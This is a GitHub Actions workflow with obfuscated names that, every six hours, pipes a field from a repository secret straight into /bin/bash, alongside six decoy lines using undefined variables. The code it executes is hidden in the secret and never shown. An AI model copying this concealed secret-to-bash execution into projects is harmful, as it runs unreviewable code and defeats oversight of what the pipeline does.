name: jixiaxingliang

on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jixiaxingliang
        env:
          bqnm4252: ${{ secrets.bqnm4252 }}
        run: |
          echo $bqnm4252 | jq -r .heafp04043 | /bin/bash
          echo $kpni4654 | jq -r .zida53 | /bin/bash
          echo $j66 | jq -r .y132 | /bin/bash
          echo $csm97 | jq -r .xhnqh6 | /bin/bash
          echo $zv54 | jq -r .zq8290 | /bin/bash
          echo $sqxpv3 | jq -r .v3 | /bin/bash
          echo $yqvjy67020 | jq -r .yuof2393 | /bin/bash

